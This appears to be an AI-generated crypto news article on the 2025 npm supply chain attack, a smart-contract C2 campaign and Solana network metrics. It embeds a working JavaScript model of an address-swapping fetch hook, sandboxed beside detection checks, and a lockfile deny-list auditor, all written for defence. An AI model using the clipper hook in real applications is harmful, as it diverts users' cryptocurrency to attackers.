Solana News Today: Open-Source Trust Hacked: Malware Stealthily Hijacks Crypto Transactions

Generated by AI agent, Coin World
Monday, September 8, 2025, 6:15 pm ET. 3 min read

Ledger CTO Charles Guillemet has issued a warning about a large supply chain attack on the npm package ecosystem, affecting packages that together account for billions of weekly downloads. Many of the compromised packages are bundled into browser-based applications, and the injected code is a crypto-clipper: it intercepts and manipulates cryptocurrency transactions, with Ethereum and Solana users among those affected. The attack began with a phishing campaign that compromised a core maintainer's npm account, after which trojanized versions of the packages were published. Once an application that bundles a compromised version loads in the browser, the malware runs in that page's JavaScript context, where it can alter transaction parameters and redirect funds to attacker-controlled addresses without the user noticing. The incident has prompted heightened caution across the Solana ecosystem, with the community emphasizing the need for stronger security practices and vigilance against this class of threat.

The compromised npm packages include highly popular ones such as chalk, debug, ansi-styles, and supports-color, which collectively account for over 2 billion weekly downloads. The malicious code hooks browser APIs such as fetch and XMLHttpRequest, as well as wallet provider interfaces such as window.ethereum, so that it can inspect outgoing requests for wallet addresses and transaction payloads. It uses string matching to find addresses and replaces each one with the closest-looking attacker-controlled address (chosen by edit distance), so a quick glance at the first and last characters does not reveal the swap. The malware is especially effective where software wallets are used, because the user interface shows the transaction the user intended while the payload that is actually sent has been altered in the background. This stealthy behavior shows how attackers are exploiting trusted open-source infrastructure, and why a transaction should be verified on a display the page cannot control, such as a hardware wallet screen, rather than in the browser alone.
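To make the mechanism concrete, here is an added example (written for this page, not code taken from the compromised packages): a simplified model of the address-swapping hook described above, installed on a sandbox object rather than the real global, together with two checks a defender can run. The addresses, the "attacker pool" and the RPC URL are constructed placeholders, and the hook only rewrites Ethereum-style hex addresses; the real payload also handled other chains.

```javascript
// Added example: simplified model of a fetch-hooking address clipper plus detection checks.
// Everything below (addresses, attacker pool, sandbox window) is constructed for illustration.

const ETH_ADDR_RE = /0x[0-9a-fA-F]{40}/g;

// Edit distance. The clipper picks the attacker address closest to the victim's so the
// swapped value looks right to someone who only compares the first and last characters.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

function pickLookalike(victimAddr, attackerPool) {
  let best = attackerPool[0];
  let bestDist = Infinity;
  for (const candidate of attackerPool) {
    const d = levenshtein(victimAddr.toLowerCase(), candidate.toLowerCase());
    if (d < bestDist) { best = candidate; bestDist = d; }
  }
  return best;
}

function swapAddresses(text, attackerPool) {
  return text.replace(ETH_ADDR_RE, (m) => pickLookalike(m, attackerPool));
}

// What a hooked fetch does: keep the original, rewrite string bodies on the way out,
// and otherwise behave normally so the page keeps working. Installed on `target`, never on globalThis here.
function installFetchHook(target, attackerPool) {
  const original = target.fetch;
  target.fetch = function hookedFetch(url, options = {}) {
    const opts = typeof options.body === 'string'
      ? { ...options, body: swapAddresses(options.body, attackerPool) }
      : options;
    return original.call(this, url, opts);
  };
}

// Check 1: a wrapped built-in no longer stringifies to "[native code]".
// Cheap, but bypassable by malware that also patches Function.prototype.toString.
function isNativeFunction(fn) {
  return /\{\s*\[native code\]\s*\}$/.test(Function.prototype.toString.call(fn));
}

// Check 2: compare the recipient in the payload actually sent with the one the user approved
// on a trusted display. This is what a hardware wallet screen does for you.
function recipientMatches(jsonBody, approvedAddr) {
  const payload = JSON.parse(jsonBody);
  return typeof payload.to === 'string' && payload.to.toLowerCase() === approvedAddr.toLowerCase();
}

// Constructed demo: a sandbox "window" whose fetch only records what it was asked to send.
function runDemo() {
  const approved = '0x1111111111111111111111111111111111111111';
  const attackerPool = [
    '0x1111111111111111111111111111111111111112', // one character off the victim's address
    '0x2222222222222222222222222222222222222222',
  ];
  const sent = [];
  const sandbox = {
    fetch(url, options) { sent.push(options.body); return Promise.resolve({ ok: true }); },
  };
  installFetchHook(sandbox, attackerPool);
  sandbox.fetch('https://rpc.example/', {
    method: 'POST',
    body: JSON.stringify({ to: approved, value: '1000' }),
  });
  return { sentBody: sent[0], swappedTo: JSON.parse(sent[0]).to, intact: recipientMatches(sent[0], approved) };
}
```

Run `runDemo()` under Node: the body handed to the sandbox's fetch carries the one-character-off attacker address while the application code believed it sent the approved one, and `recipientMatches` reports the mismatch. `isNativeFunction` flags a wrapped `fetch` or `XMLHttpRequest.prototype.send` in a browser, but treat it as a hint only, since the same malware can patch `toString`.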

In addition to the npm compromise, ReversingLabs researchers uncovered a related campaign built on two other npm packages, colortoolsv2 and mimelib2, which used Ethereum smart contracts as part of their command and control (C2) infrastructure. Rather than hard-coding a download URL, the packages read the location of the second-stage payload from a smart contract and then fetched and executed the code hosted there, so the C2 address could be rotated on-chain without republishing the package and without a suspicious URL appearing in the package source. This is a novel use of blockchain technology in supply chain attacks: the attackers rely on the decentralized, hard-to-take-down nature of smart contracts to hide where the payload really comes from. The packages were removed from npm, but the broader campaign extended to GitHub, where repositories were dressed up to look legitimate and lure developers into adding the malicious dependencies. The campaign shows how attackers increasingly combine social engineering with deceptive packaging to manipulate open-source communities.

Separately, Solana co-founder Anatoly Yakovenko has been emphasizing the network's growing economic activity and scalability. In a recent public statement, Yakovenko pointed to Solana processing 2.9 billion transactions in August 2025, a single-month figure he said exceeds Ethereum's cumulative transaction count since 2015. He presented this as evidence of Solana's capacity for high-frequency transactions and large-scale decentralized applications (dApps), and cited a 92% year-over-year increase in network-generated revenue. According to the same statement, the number of active wallets on Solana doubled to 83 million, and 843,000 new tokens were issued, 357 of them valued at over $1 million. These metrics were offered as a response to criticism that Solana is merely a showcase for high throughput without substantive economic activity, and reaffirm the platform's focus on scalability and real-world utility, which has drawn comparisons with Ethereum's evolving capabilities.

The npm compromise was not the only loss event in the period. The Swiss-based crypto platform SwissBorg lost about $41 million in SOL after attackers abused a compromised staking partner API to drain funds from its SOL Earn Program. Against this backdrop, Ledger CTO Charles Guillemet advised users who do not have a hardware wallet to refrain from on-chain transactions until the npm situation is resolved, and hardware wallet users to verify every transaction on the device screen before signing, since the device shows the real destination even when the browser has been tampered with. The advice reflects a broader push for best practices in digital asset management, including multi-signature wallets, smart contract audits, and continuous monitoring of third-party dependencies. Both incidents show how interconnected the crypto ecosystem is: a weakness in one component, whether a partner's API or a logging library, can have cascading effects across platforms. Developers and platform operators are therefore being urged to take a proactive approach to security, with transparency and collaboration in mitigating emerging threats.
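One concrete form of the dependency monitoring mentioned above, added here as an example and not taken from any of the parties named on this page: an offline audit of a project's `package-lock.json` (lockfile v2/v3 "packages" map) against a deny-list of package versions, plus checks that every dependency was resolved from the expected registry with an integrity hash. The lockfile and the deny-list below are constructed; the denied versions are deliberately fake and are not the versions published in the real incident.

```javascript
// Added example: audit a package-lock.json against a version deny-list and source/integrity expectations.
// DENY_LIST and SAMPLE_LOCKFILE are constructed; replace them with your own data.

const DENY_LIST = {
  chalk: new Set(['9.9.9']), // constructed placeholder versions, not the real compromised ones
  debug: new Set(['8.8.8']),
};

// Lockfile keys look like "node_modules/chalk" or "node_modules/a/node_modules/@scope/b";
// the package name is everything after the last "node_modules/".
function packageNameFromPath(path) {
  const idx = path.lastIndexOf('node_modules/');
  return idx === -1 ? path : path.slice(idx + 'node_modules/'.length);
}

function auditLockfile(lockfile, denyList = DENY_LIST, trustedHost = 'registry.npmjs.org') {
  const findings = [];
  for (const [path, entry] of Object.entries(lockfile.packages || {})) {
    if (path === '') continue; // the root project entry, not a dependency
    if (entry.link) continue;  // workspace symlink, nothing was downloaded
    const name = packageNameFromPath(path);
    const { version, resolved, integrity } = entry;

    if (denyList[name] && denyList[name].has(version)) {
      findings.push({ name, version, issue: 'denied-version' });
    }
    if (resolved) {
      let host = null;
      try { host = new URL(resolved).host; } catch { /* malformed URL: treated as untrusted */ }
      if (host !== trustedHost) findings.push({ name, version, issue: 'untrusted-source', resolved });
    } else {
      findings.push({ name, version, issue: 'no-resolved-url' });
    }
    if (!integrity) findings.push({ name, version, issue: 'no-integrity' });
  }
  return findings;
}

// Anything that means "do not install this tree" in CI.
function hasBlockingFindings(findings) {
  return findings.some((f) => f.issue === 'denied-version' || f.issue === 'untrusted-source');
}

// Constructed lockfile: one denied version, one clean package, one fetched from a mirror without a hash.
const SAMPLE_LOCKFILE = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/chalk': {
      version: '9.9.9',
      resolved: 'https://registry.npmjs.org/chalk/-/chalk-9.9.9.tgz',
      integrity: 'sha512-AAAA',
    },
    'node_modules/debug': {
      version: '4.0.0',
      resolved: 'https://registry.npmjs.org/debug/-/debug-4.0.0.tgz',
      integrity: 'sha512-BBBB',
    },
    'node_modules/left-pad': {
      version: '1.3.0',
      resolved: 'https://mirror.example.net/left-pad-1.3.0.tgz',
    },
  },
};

function auditSample() {
  return auditLockfile(SAMPLE_LOCKFILE);
}
```

For a real project, load the file with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`, fail the build when `hasBlockingFindings` is true, and install with `npm ci --ignore-scripts` so that the lockfile, not a fresh resolution, decides which versions land on the machine.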

Looking ahead, the implications of this supply chain attack extend beyond the immediate cleanup and raise questions about the governance and oversight of open-source ecosystems. The reliance on third-party libraries, and the trust developers place in registries such as npm, exposes systemic risk: a single phished maintainer account was enough to put malicious code in front of billions of weekly downloads. On the protocol side, the Solana community is moving ahead with consensus changes such as the Alpenglow upgrade, approved by validator vote, which targets much faster transaction finality and stronger fault tolerance; these are infrastructure resilience efforts in their own right, though they do not address client-side supply chain risk. Meanwhile, industry stakeholders are increasingly advocating tools and frameworks that detect and block malicious code before it is integrated into legitimate software projects, such as lockfile pinning, install-time script controls, and registry-side checks. As the lines between open-source collaboration and security exposure continue to blur, robust governance mechanisms and developer education, starting with phishing-resistant two-factor authentication on maintainer accounts, are becoming essential.

Sources:

[1] Largest NPM Compromise in History - Supply Chain Attack (https://www.reddit.com/r/programming/comments/1nbqt4d/largest_npm_compromise_in_history_supply_chain/)

[2] Ethereum smart contracts used to push malicious code on (https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code)

[3] npm debug and chalk packages compromised (https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised)

[4] Solana (SOL) Founder Makes Statement About Ethereum (https://www.mexc.com/news/solana-sol-founder-makes-statement-about-ethereum-what-theyve-been-able-to-do-since-2015-we/88247)

[5] Solana, Snorter, and Profitable Mining Usher in a New Era (https://coincentral.com/on-chain-technology-meets-financial-integration-solana-snorter-and-profitable-mining-usher-in-a-new-era/)

[6] SwissBorg crypto platform robbed of over $40 million in (https://www.theblock.co/post/369924/swissborg-crypto-platform-robbed-of-over-40-million-in-solana?utm_medium=rss&utm_source=companies.xml)

[7] Solana: Latest News, Social Media Updates and Insights (https://cryptorank.io/news/solana)
